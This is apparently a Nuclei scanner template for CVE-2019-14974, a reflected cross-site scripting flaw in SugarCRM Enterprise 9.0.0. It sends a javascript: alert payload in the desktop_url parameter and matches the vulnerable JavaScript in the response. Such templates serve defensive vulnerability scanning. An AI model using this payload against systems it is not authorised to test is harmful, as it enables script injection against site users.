20 lines
454 B
YAML
20 lines
454 B
YAML
id: CVE-2019-14974
|
|
|
|
info:
|
|
name: SugarCRM Enterprise 9.0.0 - Cross-Site Scripting
|
|
author: madrobot
|
|
severity: low
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/mobile/error-not-supported-platform.html?desktop_url=javascript:alert(1337);//itms://"
|
|
matchers:
|
|
- type: status
|
|
status:
|
|
- 200
|
|
- type: word
|
|
words:
|
|
- "url = window.location.search.split(\"?desktop_url=\")[1]"
|
|
part: body
|